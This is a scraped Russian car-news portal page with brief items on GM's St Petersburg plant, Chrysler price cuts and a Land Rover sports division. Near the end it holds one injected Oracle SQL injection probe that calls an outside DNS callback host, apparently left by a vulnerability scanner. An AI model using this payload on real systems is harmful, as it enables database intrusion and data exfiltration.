Главная     Мототехника     Автофирмы     Полезное     Автострахование     Доска обьявлений     Реклама     Автотюнинг     Карта сайта    
Предложения
Всего: 9 Посмотреть »

Личный кабинет

Погода

Предложения

Загрузка предложений ...

Партнёры

SolarStyle Studio разработка сайтов, хостинг, домены, дизайн.

Некоторые автоновости
17 февраля 2009г.
Завод GM в Санкт-Петербурге начинает выпуск товарных автомобилей.

Петербургский завод General Motors, до сих пор выпускавший автомобили только в тестовом режиме, сегодня начинает сборку товарных машин. Как сообщил агентству «АВТОСТАТ» директор по связям с общественностью GM СНГ Сергей Лепнухов, в настоящее время на новом предприятии выпускаются только внедорожники Chevrolet Captiva. Сборку автомобилей Opel Antara планируется начать «в ближайшем будущем». Напомним, с 26 января предприятие работает в сокращенном режиме – три дня в неделю.
Подробнее »
1 мая 2009г.
Группа Chrysler снизила цены на автомобили в России на четверть

В четверг российское представительство концерна Chrysler объявило о введении в действие с 1 мая текущего года нового прайс-листа на все модели Chrysler, Jeep и Dodge, в соответствии с которым цены на машины снизились в среднем на 25 процентов.
Подробнее »
04 ноября 2011г.
Land Rover откроет спортивное подразделение

Land Rover откроет спортивное подразделение, которое будет заниматься тюнингом внедорожников марки. Об этом объявил глобальный бренд-директор Land Rover Джон Эдвардс. По его словам, компании не хватает «заряженных» автомобилей и она думает над созданием суббренда типа Jaguar R.
Подробнее »
Mr.
1||UTL_INADDR.get_host_address('dns.'||'sqli.013405.529-41370.529.a9e86.1.bxss'||'.me')

Источник: 1
Реклама










Быстрый поиск

Загрузка поиска ...

Автофирмы Ставрополь

Загрузка автофирм...

Автоновости

Загрузка новостей...

Реклама

    Руководитель сайта: Артёмов Владимир Николаевич Разработка и поддержка сайта - SolarStyle Studio   
Rambler's Top100 Яндекс.Метрика